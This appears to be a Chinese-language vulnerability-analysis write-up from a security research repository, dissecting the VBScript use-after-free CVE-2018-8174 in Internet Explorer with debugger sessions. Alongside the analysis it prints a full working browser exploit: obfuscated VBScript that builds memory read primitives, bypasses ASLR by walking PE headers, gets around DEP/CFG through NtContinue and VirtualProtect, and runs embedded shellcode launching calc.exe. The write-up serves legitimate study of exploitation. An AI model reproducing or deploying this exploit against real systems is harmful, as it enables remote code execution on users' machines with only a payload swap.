https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2017-5070/CVE-2017-50702.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2017-5070/CVE-2017-50703.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2017-5070/CVE-2017-50703.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2017-5070/CVE-2017-50704.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2017-5070/CVE-2017-50704.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174.md:
--------------------------------------------------------------------------------
  1 | # UAF分析
  2 | 
  3 | 0. flow chart
  4 | 
  5 | ![](CVE-2018-8174/CVE-2018-817429.png)
  6 | 
  7 | 1. Crash POC
  8 | ```
  9 | <html lang="en">
 10 | <body>
 11 | <script language="vbscript">
 12 | Dim array_a
 13 | Dim array_b(1)
 14 | Class Trigger
 15 | Private Sub Class_Terminate()
 16 |     Set array_b(0) = array_a(1)
 17 |     array_a(1) = 1
 18 | End Sub
 19 | End Class
 20 | 
 21 | Sub UAF
 22 |     ReDim array_a(1)
 23 |     Set array_a(1) = New Trigger
 24 |     Erase array_a
 25 | End Sub
 26 | 
 27 | Sub TriggerVuln
 28 |     array_b(0) = 0
 29 | End Sub
 30 | 
 31 | Sub StartExploit
 32 |     UAF
 33 |     TriggerVuln
 34 | End Sub
 35 | StartExploit
 36 | 
 37 | </script>
 38 | </body>
 39 | 
 40 | </html>
 41 | ```
 42 | 
 43 | ```
 44 | C:\Program Files\Debugging Tools for Windows (x86)>gflags.exe /i iexplore.exe +h
 45 | pa
 46 | Current Registry Settings for iexplore.exe executable are: 02000000
 47 |     hpa - Enable page heap
 48 | ```
 49 | 
 50 | ![](CVE-2018-8174/CVE-2018-81740.png)
 51 | 
 52 | 加log IsEmpty()，辅助分析
 53 | 
 54 | ```
 55 | <html lang="en">
 56 | <body>
 57 | <script language="vbscript">
 58 | Dim array_a
 59 | Dim array_b(1)
 60 | Class Trigger
 61 | Private Sub Class_Terminate()
 62 |     Set array_b(0) = array_a(1)
 63 |     array_a(1) = 1
 64 |     IsEmpty(array_b)
 65 | End Sub
 66 | End Class
 67 | 
 68 | Sub UAF
 69 |     ReDim array_a(1)
 70 |     Set array_a(1) = New Trigger
 71 |     IsEmpty(array_a)
 72 |     Erase array_a
 73 |     IsEmpty("Erase Finish")
 74 | End Sub
 75 | 
 76 | Sub TriggerVuln
 77 |     array_b(0) = 0
 78 | End Sub
 79 | 
 80 | Sub StartExploit
 81 |     UAF
 82 |     TriggerVuln
 83 | End Sub
 84 | StartExploit
 85 | 
 86 | </script>
 87 | </body>
 88 | 
 89 | </html>
 90 | ```
 91 | 
 92 | ![](CVE-2018-8174/CVE-2018-81741.png)
 93 | 
 94 | ![](CVE-2018-8174/CVE-2018-817427.png)
 95 | 
 96 | 到这里可以看到，array_a(1)已经指向Trigger对象，继续调试。(调到这里的时候windb hang住了，只好杀了重新调试，新的array_a 地址是 0x081affe8)
 97 | 
 98 | ![](CVE-2018-8174/CVE-2018-81742.png)
 99 | 
100 | 执行到第三个IsEmpty，这时候array_a和Trigger object 已经释放，array_b中还保存着对Trigger object 的引用。
101 | 随后 array_b(0) = 0访问了被释放的内存，从而触发UAF 漏洞
102 | 
103 | ![](CVE-2018-8174/CVE-2018-81744.png)
104 | 
105 | ![](CVE-2018-8174/CVE-2018-81745.png)
106 | 
107 | 显然，当 array_b 还引用Trigger Object的时候，Trigger Object却随着 Erase array_a被释放了。我们来看看是哪里发生了错误。
108 | 
109 | ![](CVE-2018-8174/CVE-2018-81746.png)
110 | 
111 | 看过伪代码后，通过调试进一步验证猜测
112 | 
113 | ```
114 | 0:004> bl
115 |  0 e 6b1e343d     0001 (0001)  0:**** vbscript!VbsErase
116 |  1 e 6b1a5f1c     0001 (0001)  0:**** vbscript!VBScriptClass::Release
117 |  2 e 6b1a583e     0001 (0001)  0:**** vbscript!VbsIsEmpty
118 | ```
119 | 进入到   vbscript!VBScriptClass::Release 把上述断点disable掉，否则单步调试会断在我们不期望的地方
120 | 
121 | ![](CVE-2018-8174/CVE-2018-81747.png)
122 | 
123 | ![](CVE-2018-8174/CVE-2018-81748.png)
124 | 
125 | ![](CVE-2018-8174/CVE-2018-81749.png)
126 | 
127 | 2. 漏洞利用（pop up calc.exe）
128 | ```
129 | <!doctype html>
130 | <html lang="en">
131 | <head>
132 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
133 | <meta http-equiv="x-ua-compatible" content="IE=10">
134 | <meta http-equiv="Expires" content="0">
135 | <meta http-equiv="Pragma" content="no-cache">
136 | <meta http-equiv="Cache-control" content="no-cache">
137 | <meta http-equiv="Cache" content="no-cache">
138 | </head>
139 | <body>
140 | <script language="vbscript">
141 | Dim array_a
142 | Dim array_b(6),array_c(6)
143 | Dim spec_int_2
144 | Dim IIllI(40)
145 | Dim str_1,str_2
146 | Dim spec_int_1
147 | Dim cla4_obj1,cla4_obj2
148 | Dim cla6_obj1,cla7_obj1
149 | Dim NtContinueAddr,VirtualProtectAddr
150 |  
151 | spec_int_1=&hBADF00D
152 | str_1=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
153 | str_2=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
154 | spec_int_2=&hBAD0BAD
155 | Function IIIII(Domain) 
156 |     lIlII=0
157 |     IllllI=0
158 |     IIlIIl=0
159 |     Id=CLng(Rnd*1000000)
160 |     lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
161 |     If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
162 |         lIlII=lIlII-(&h86d+6447-&H219b)
163 |     End If
164 |  
165 |     IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
166 |     IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
167 |     IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
168 | End Function
169 |  
170 | Function lIIII(ByVal lIlIl)
171 |     IIll=""
172 |     For index=0 To Len(lIlIl)-1
173 |         IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
174 |     Next
175 |     IIll=IIll &"00"
176 |     If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
177 |         IIll=IIll &"00"
178 |     End If
179 |     For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
180 |         lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
181 |         lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
182 |         lIIII=lIIII &"%u" &lIlIll &lIIIlI
183 |     Next
184 | End Function
185 | Function lIlI(ByVal Number,ByVal Length)
186 |     IIII=Hex(Number)
187 |     If Len(IIII)<Length Then
188 |         IIII=String(Length-Len(IIII),"0") &IIII    'pad allign with zeros 
189 |     Else
190 |         IIII=Right(IIII,Length)
191 |     End If
192 |     lIlI=IIII
193 | End Function
194 | Function GetUint32(lIII)
195 |     Dim value
196 |     cla4_obj1.mem(spec_int_1+8)=lIII+4
197 |     cla4_obj1.mem(spec_int_1)=8        'type string
198 |     value=cla4_obj1.P0123456789
199 |     cla4_obj1.mem(spec_int_1)=2
200 |     GetUint32=value
201 | End Function
202 | Function IllIIl(lIII)
203 |     IllIIl=GetUint32(lIII) And (131071-65536)
204 | End Function
205 | Function lllII(lIII)
206 |     lllII=GetUint32(lIII)  And (&h17eb+1312-&H1c0c)
207 | End Function
208 | Sub llllll
209 | End Sub
210 | Function GetMemValue
211 |     cla4_obj1.mem(spec_int_1)= 3
212 |     GetMemValue=cla4_obj1.mem(spec_int_1+ 8)
213 | End Function
214 | Sub SetMemValue(ByRef IlIIIl)
215 |     cla4_obj1.mem(spec_int_1+8)=IlIIIl
216 | End Sub
217 | Function LeakVBAddr
218 |     On Error Resume Next
219 |     Dim cscript_entry_point_obj
220 |     cscript_entry_point_obj=llllll
221 |     cscript_entry_point_obj=null
222 |     SetMemValue cscript_entry_point_obj
223 |     LeakVBAddr=GetMemValue()
224 | End Function
225 | Function GetBaseByDOSmodeSearch(IllIll)
226 |     Dim llIl
227 |     llIl=IllIll And &hffff0000
228 |     Do While GetUint32(llIl+(104))<>544106784 Or GetUint32(llIl+(108))<>542330692
229 |         llIl=llIl-65536
230 |     Loop
231 |     GetBaseByDOSmodeSearch=llIl
232 | End Function
233 | Function StrCompWrapper(lIII,llIlIl)
234 |     Dim lIIlI,IIIl
235 |     lIIlI=""
236 |     For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
237 |         lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
238 |     Next
239 |     StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
240 | End Function
241 | Function GetBaseFromImport(base_address,name_input)
242 |     Dim import_rva,nt_header,descriptor,import_dir
243 |     Dim IIIIII
244 |     nt_header=GetUint32(base_address+(&h3c))
245 |     'IsEmpty(nt_header)
246 |     import_rva=GetUint32(base_address+nt_header+&h80)
247 |     'IsEmpty(import_rva)
248 |     import_dir=base_address+import_rva
249 |     'IsEmpty(import_dir)
250 |     descriptor=0
251 |     Do While True
252 |         Dim Name
253 |         Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
254 |         If Name=0 Then
255 |             GetBaseFromImport=&hBAAD0000
256 |             Exit Function
257 |         Else
258 |             If StrCompWrapper(base_address+Name,name_input)=0 Then
259 |                 Exit Do
260 |             End If
261 |         End If
262 |         descriptor=descriptor+1
263 |     Loop
264 |     IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
265 |     GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
266 | End Function
267 |  
268 | Function GetProcAddr(dll_base,name)
269 |     Dim p,export_dir,index
270 |     Dim function_rvas,function_names,function_ordin
271 |     Dim Illlll
272 |     p=GetUint32(dll_base+&h3c)
273 |     p=GetUint32(dll_base+p+&h78)
274 |     export_dir=dll_base+p
275 |  
276 |     function_rvas=dll_base+GetUint32(export_dir+&h1c)
277 |     function_names=dll_base+GetUint32(export_dir+&h20)
278 |     function_ordin=dll_base+GetUint32(export_dir+&h24)
279 |     index=0
280 |     Do While True
281 |         Dim lllI
282 |         lllI=GetUint32(function_names+index*4)
283 |         If StrCompWrapper(dll_base+lllI,name)=0 Then
284 |             Exit Do
285 |         End If
286 |         index=index+1
287 |     Loop
288 |     Illlll=IllIIl(function_ordin+index*2)
289 |     p=GetUint32(function_rvas+Illlll*4)
290 |     GetProcAddr=dll_base+p
291 | End Function
292 |  
293 | Function GetShellcode()
294 |     IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100%u0065%u0000%u0000%u0000%u0000%u0000%ucc00%ucccc%ucccc%ucccc%ucccc" &lIIII(IIIII("")))
295 |     IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
296 |     GetShellcode=IIlI
297 | End Function
298 | Function EscapeAddress(ByVal value)
299 |     Dim High,Low
300 |     High=lIlI((value And &hffff0000)/&h10000,4)
301 |     Low=lIlI(value And &hffff,4)
302 |     EscapeAddress=Unescape("%u" &Low &"%u" &High)
303 | End Function
304 | Function lIllIl
305 |     Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
306 |     IlllI=lIlI(NtContinueAddr,8)
307 |     IlIII=Mid(IlllI,1,2)
308 |     llllI=Mid(IlllI,3,2)
309 |     llIII=Mid(IlllI,5,2)
310 |     lIllI=Mid(IlllI,7,2)
311 |     IIlI=""
312 |     IIlI=IIlI &"%u0000%u" &lIllI &"00"
313 |     For IIIl=1 To 3
314 |         IIlI=IIlI &"%u" &llllI &llIII
315 |         IIlI=IIlI &"%u" &lIllI &IlIII
316 |     Next
317 |     IIlI=IIlI &"%u" &llllI &llIII
318 |     IIlI=IIlI &"%u00" &IlIII
319 |     lIllIl=Unescape(IIlI)
320 | End Function
321 | Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
322 |     Dim IIlI
323 |     IIlI=String((100334-65536),Unescape("%u4141"))
324 |     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
325 |     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
326 |     IIlI=IIlI &EscapeAddress(&h3000)
327 |     IIlI=IIlI &EscapeAddress(&h40)
328 |     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
329 |     IIlI=IIlI &String(6,Unescape("%u4242"))
330 |     IIlI=IIlI &lIllIl()
331 |     IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
332 |     WrapShellcodeWithNtContinueContext=IIlI
333 | End Function
334 | Function ExpandWithVirtualProtect(Addr_wrap_sh_with_ntcontinue)
335 |     Dim IIlI
336 |     Dim lllllI
337 |     lllllI=Addr_wrap_sh_with_ntcontinue+&h23
338 |     IIlI=""
339 |     IIlI=IIlI &EscapeAddress(lllllI)
340 |     IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
341 |     IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
342 |     IIlI=IIlI &EscapeAddress(&h1b)
343 |     IIlI=IIlI &EscapeAddress(0)
344 |     IIlI=IIlI &EscapeAddress(Addr_wrap_sh_with_ntcontinue)
345 |     IIlI=IIlI &EscapeAddress(&h23)
346 |     IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
347 |     ExpandWithVirtualProtect=IIlI
348 | End Function
349 | Sub ExecuteShellcode
350 |     cla4_obj1.mem(spec_int_1)=&h4d 'DEP bypass
351 |     IsEmpty("set fake type 4d")
352 |     
353 |     cla4_obj1.mem(spec_int_1+8)=0  '触发shellcode
354 |     msgbox(spec_int_1)        'VT replaced
355 | End Sub
356 |  
357 | Class cla1
358 | Private Sub Class_Terminate()
359 |     Set array_b(spec_int_2)=array_a((&h1078+5473-&H25d8))
360 |     spec_int_2=spec_int_2+(&h14b5+2725-&H1f59)
361 |     array_a((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
362 | End Sub
363 |  
364 | End Class
365 |  
366 | Class cla2
367 | Private Sub Class_Terminate()
368 |     Set array_c(spec_int_2)=array_a((&h15b+3616-&Hf7a))
369 |     spec_int_2=spec_int_2+(&h880+542-&Ha9d)
370 |     array_a((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
371 | End Sub
372 | End Class
373 |  
374 | Class cla3
375 | End Class
376 |  
377 | Class cla4
378 |     Dim mem
379 |     Function P
380 |     End Function
381 |     Function SetProp(Value)
382 |         mem=Value
383 |         SetProp=0
384 |     End Function
385 | End Class
386 |  
387 | Class cla5
388 |     Dim mem
389 |     Function P0123456789
390 |         P0123456789=LenB(mem(spec_int_1+8))
391 |     End Function
392 |     Function SPP
393 |     End Function
394 | End Class
395 |  
396 | Class cla6
397 |     Public Default Property Get P
398 |         Dim cla5_obj1
399 |         P=174088534690791e-324 '4. 最后一步，将cla5_obj1.mem的type 改为array 类型
400 |         For IIIl= 0 To 6
401 |             array_b(IIIl)= 0  '1. 由于之前的UAF, array_b 保存着对cla4 object的引用,从而可以释放cla4_obj
402 |         Next
403 |         Set cla5_obj1=New cla5
404 |         cla5_obj1.mem=str_1   '2. 使用clas5 object占位， cla5_obj1.mem 为精心构造字符串，且位置与cla4_obj1.mem 相差0xc个字节
405 |         For IIIl= 0 To 6
406 |             Set array_b(IIIl)=cla5_obj1 '3. array_b 保存对cla5_obj的引用
407 |         Next
408 |     End Property
409 | End Class
410 |  
411 | Class cla7
412 |     Public Default Property Get P
413 |     Dim cla5_obj2
414 |     P=636598737289582e-328        '将cla5_obj2.mem 的type 改为Long 类型
415 |     For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
416 |         array_c(IIIl)=(&h442+2598-&He68)
417 |     Next
418 |     Set cla5_obj2=New cla5
419 |     cla5_obj2.mem=str_2
420 |     For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
421 |         Set array_c(IIIl)=cla5_obj2
422 |     Next
423 |     End Property
424 | End Class
425 |  
426 | Set cla6_obj1=New cla6
427 | Set cla7_obj1=New cla7
428 | Sub UAF
429 |     For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
430 |         Set IIllI(IIIl)=New cla3
431 |     Next
432 |     For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
433 |         Set IIllI(IIIl)=New cla4
434 |     Next
435 |     spec_int_2=0
436 |     For IIIl=0 To 6
437 |         ReDim array_a(1)
438 |         Set array_a(1)=New cla1
439 |         Erase array_a
440 |     Next
441 |     Set cla4_obj1=New cla4
442 |     spec_int_2=0
443 |     For IIIl=0 To 6
444 |         ReDim array_a(1)
445 |         Set array_a(1)=New cla2
446 |         Erase array_a
447 |     Next
448 |     Set cla4_obj2=New cla4
449 | End Sub
450 | Sub InitObjects
451 |     cla4_obj1.SetProp(cla6_obj1)
452 |     cla4_obj2.SetProp(cla7_obj1)
453 |     spec_int_1=cla4_obj2.mem
454 | End Sub
455 |  
456 | Sub StartExploit
457 |     UAF
458 |     InitObjects
459 |     vb_adrr=LeakVBAddr()
460 |     vt_adrr = GetUint32(vb_adrr)
461 |     'IsEmpty(vt_adrr)
462 |     'Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(vt_adrr)
463 |     
464 |     vbs_base=GetBaseByDOSmodeSearch(vt_adrr)
465 |     'IsEmpty(vbs_base)
466 |     'Alert "VBScript Base: 0x" & Hex(vbs_base) 
467 |     
468 |     msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
469 |     'Alert "MSVCRT Base: 0x" & Hex(msv_base) 
470 |     
471 |     krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
472 |     'Alert "KernelBase Base: 0x" & Hex(krb_base) 
473 |     
474 |     ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
475 |     'Alert "Ntdll Base: 0x" & Hex(ntd_base) 
476 |     
477 |     VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
478 |     'Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr) 
479 |     
480 |     NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
481 |     'Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr) 
482 |     
483 |     SetMemValue GetShellcode()
484 |     ShellcodeAddr=GetMemValue()+8
485 |     IsEmpty(ShellcodeAddr)
486 |     'Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
487 |     IsEmpty(spec_int_1)
488 |     
489 |     SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
490 |     Addr_wrap_sh_with_ntcontinue=GetMemValue()+69596
491 |     IsEmpty(Addr_wrap_sh_with_ntcontinue)
492 |     
493 |     SetMemValue ExpandWithVirtualProtect(Addr_wrap_sh_with_ntcontinue)
494 |     Addr_expand_with_virtualprotect=GetMemValue()
495 |     IsEmpty(Addr_expand_with_virtualprotect)
496 |     
497 |     'Alert "Executing Shellcode"
498 |     IsEmpty("Executing Shellcode")
499 |     ExecuteShellcode
500 | End Sub
501 | StartExploit
502 | </script>
503 | </body>
504 | </html>
505 | 
506 | ```
507 | 
508 | 以下要关掉PageHeap再调试
509 | + 先粗略看下VBScript中Class 结构
510 | ```
511 | <html lang="en">
512 | <body>
513 | <script language="vbscript">
514 | Dim X
515 | Class TestClass
516 |     Dim a,b
517 |     
518 |     Private Sub Class_Initialize   
519 |         a=&h1122334
520 |         b="test string"
521 |     End Sub
522 |     Private Sub Class_Terminate   
523 |     End Sub
524 |     
525 |     Sub test_fun
526 |         test_fun=1
527 |     End Sub
528 |     
529 | End Class
530 | Set X = New TestClass
531 | IsEmpty(X)
532 | </script>
533 | </body>
534 | 
535 | </html>
536 | ```
537 | 
538 | ![](CVE-2018-8174/CVE-2018-817410.png)
539 | 
540 | ![](CVE-2018-8174/CVE-2018-817411.png)
541 | 
542 | + UAF
543 | 
544 | ![](CVE-2018-8174/CVE-2018-817412.png)
545 | 
546 | ![](CVE-2018-8174/CVE-2018-817413.png)
547 | 
548 | ![](CVE-2018-8174/CVE-2018-817414.png)
549 | 
550 | ![](CVE-2018-8174/CVE-2018-817415.png)
551 | 
552 | ![](CVE-2018-8174/CVE-2018-817428.png)
553 | 
554 | + InitObjects
555 | 
556 | ![](CVE-2018-8174/CVE-2018-817416.png)
557 | 
558 | 执行前：
559 | 
560 | ![](CVE-2018-8174/CVE-2018-817417.png)
561 | 
562 | 执行中：
563 | 
564 | ![](CVE-2018-8174/CVE-2018-817418.png)
565 | 
566 | ![](CVE-2018-8174/CVE-2018-817419.png)
567 | 
568 | ![](CVE-2018-8174/CVE-2018-817420.png)
569 | 
570 | ![](CVE-2018-8174/CVE-2018-817421.png)
571 | 
572 | 
573 | 同理，
574 | 
575 | ![](CVE-2018-8174/CVE-2018-817422.png)
576 | 
577 | + Leak CScriptEntryPointObject Address
578 | 
579 | ![](CVE-2018-8174/CVE-2018-817423.png)
580 | 
581 | ![](CVE-2018-8174/CVE-2018-817424.png)
582 | 
583 | ![](CVE-2018-8174/CVE-2018-817425.png)
584 | 
585 | ![](CVE-2018-8174/CVE-2018-817426.png)
586 | 
587 | 拿到CscriptEntry 对象地址后，要想办法拿到类的虚表指针，其实也就是 [vb_addr]
588 | 
589 | 这里用到的一个基础知识点是，string的length是放在string 对象的前4个字节的。 这里就不对此展开了。
590 | 
591 | ```
592 | Function GetUint32(lIII)
593 |     Dim value
594 |     cla4_obj1.mem(spec_int_1+8)=lIII+4
595 |     cla4_obj1.mem(spec_int_1)=8        'type string
596 |     value=cla4_obj1.P0123456789
597 |     cla4_obj1.mem(spec_int_1)=2
598 |     GetUint32=value
599 | End Function
600 | ```
601 | 
602 | 
603 | 
604 | # Bypass ALSR
605 | 
606 | 拿CVE-2018-8174 中的代码片段为例，大致学习了PE结构、以及如何利用该结构bypass ALSR
607 | 
608 | 参考：
609 | 
610 | https://blog.csdn.net/Apollon_krj/article/details/77069342
611 | 
612 | http://www.cnblogs.com/SkyMouse/archive/2012/05/10/2493725.html
613 | 
614 | https://blog.csdn.net/Apollon_krj/article/details/77337333
615 | 
616 | https://blog.csdn.net/evi10r/article/details/7216467
617 | 
618 | 1. 拿到vbs对象虚表指针后，如何得到vbscript.dll的地址？
619 | ```
620 | Function GetBaseByDOSmodeSearch(IllIll)
621 |     Dim llIl
622 |     llIl=IllIll And &hffff0000
623 |     Do While GetUint32(llIl+(104))<>544106784 Or GetUint32(llIl+(108))<>542330692
624 |         llIl=llIl-65536
625 |     Loop
626 |     GetBaseByDOSmodeSearch=llIl
627 | End Function
628 | 
629 | vbs_base=GetBaseByDOSmodeSearch(vt_adrr)
630 | ```
631 | 
632 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR0.png)
633 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR1.png)
634 | 
635 | 可以看到PE头部其实有很多偏移固定的值，比如MZ头、“DOS Mode”等等， 拿到vbscript中一个对象的虚表地址之后，即可向低地址遍历，寻找固定偏移的值，从而确定vbscript.dll的地址。
636 | 
637 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR2.png)
638 | 
639 | 2. 根据vbscipt.dll， 如何得到系统dll基址？ 依据导入表信息！
640 | ```
641 | Function StrCompWrapper(lIII,llIlIl)
642 |     Dim lIIlI,IIIl
643 |     lIIlI=""
644 |     For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
645 |         lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
646 |     Next
647 |     StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
648 | End Function
649 | Function GetBaseFromImport(base_address,name_input)
650 |     Dim import_rva,nt_header,descriptor,import_dir
651 |     Dim IIIIII
652 |     nt_header=GetUint32(base_address+(&h3c))
653 |     IsEmpty(nt_header)
654 |     import_rva=GetUint32(base_address+nt_header+&h80)
655 |     IsEmpty(import_rva)
656 |     import_dir=base_address+import_rva
657 |     IsEmpty(import_dir)
658 |     descriptor=0
659 |     Do While True
660 |         Dim Name
661 |         Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
662 |         If Name=0 Then
663 |             GetBaseFromImport=&hBAAD0000
664 |             Exit Function
665 |         Else
666 |             If StrCompWrapper(base_address+Name,name_input)=0 Then
667 |                 Exit Do
668 |             End If
669 |         End If
670 |         descriptor=descriptor+1
671 |     Loop
672 |     IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
673 |     GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
674 | End Function
675 | msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
676 | ```
677 | 
678 | PE头的最后一部分是PE文件可选头，最后0x80大小的结构体成员就描述了dll的各种数据表信息
679 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR5.png)
680 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR4.png)
681 | 
682 | 根据上述描述，我们能确定导入表RVA相对PE header的偏移为0x80
683 | 
684 | 而导入表的内容则是多个大小为0x14字节的_IMAGE_IMPORT_DESCRIPTOR组成，每个_IMAGE_IMPORT_DESCRIPTOR 对应一个dll
685 | 
686 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR7.png)
687 | 
688 | 关注一下_IMAGE_IMPORT_DESCRIPTOR中的Name和FirstThunk字段，即可轻松获取dll名字及其导出函数地址。得到函数地址，也就能确定dll基址了。
689 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR6.png)
690 | 
691 | 以下调试过程即对应上述寻找思路
692 | ```
693 | 0:004> dd vbscript
694 | 6ae60000  00905a4d 00000003 00000004 0000ffff
695 | 6ae60010  000000b8 00000000 00000040 00000000
696 | 6ae60020  00000000 00000000 00000000 00000000
697 | 6ae60030  00000000 00000000 00000000 000000f0     偏移0x3c处，是PE头RVA
698 | 6ae60040  0eba1f0e cd09b400 4c01b821 685421cd
699 | 6ae60050  70207369 72676f72 63206d61 6f6e6e61
700 | 6ae60060  65622074 6e757220 206e6920 20534f44
701 | 6ae60070  65646f6d 0a0d0d2e 00000024 00000000
702 | 0:004> dd vbscript+000000f0
703 | 6ae600f0  00004550 0004014c 55b000b4 00000000
704 | 6ae60100  00000000 210200e0 000a010b 00056800
705 | 6ae60110  00010400 00000000 000013e5 00001000
706 | 6ae60120  00055000 6ae60000 00001000 00000200
707 | 6ae60130  00010006 00010006 00000006 00000000
708 | 6ae60140  0006a000 00000400 0007180f 01400002
709 | 6ae60150  00040000 00001000 00100000 00001000
710 | 6ae60160  00000000 00000010 000023fc 000000a5
711 | 0:004> dd 6ae600f0+0x80                           导入表地址
712 | 6ae60170  00056890 00000064 0005d000 00008870
713 | 6ae60180  00000000 00000000 00000000 00000000
714 | 6ae60190  00066000 000034f0 00057628 00000038
715 | 6ae601a0  00000000 00000000 00000000 00000000
716 | 6ae601b0  00000000 00000000 00038220 00000040
717 | 6ae601c0  00000000 00000000 00001000 00000330
718 | 6ae601d0  000565cc 00000080 00000000 00000000
719 | 6ae601e0  00000000 00000000 7865742e 00000074
720 | 0:004> dd vbscript+00056890                   
721 | 6aeb6890  0005692c 00000000 00000000 00056920
722 | 6aeb68a0  00001000 00056a38 00000000 00000000
723 | 6aeb68b0  00056910 0000110c 00056ad4 00000000
724 | 6aeb68c0  00000000 00056900 000011a8 00056bf8    导入表内容，每0x14个字节为一个_IMAGE_IMPORT_DESCRIPTOR结构
725 | 6aeb68d0  00000000 00000000 000568f4 000012cc
726 | 6aeb68e0  00000000 00000000 00000000 00000000
727 | 6aeb68f0  00000000 52455355 642e3233 90006c6c
728 | 6aeb6900  4e52454b 32334c45 6c6c642e 90909000
729 | 0:004> da vbscript+00056920      _IMAGE_IMPORT_DESCRIPTOR结构中偏移0x10是导入dll name的RVA
730 | 6aeb6920  "msvcrt.dll"  
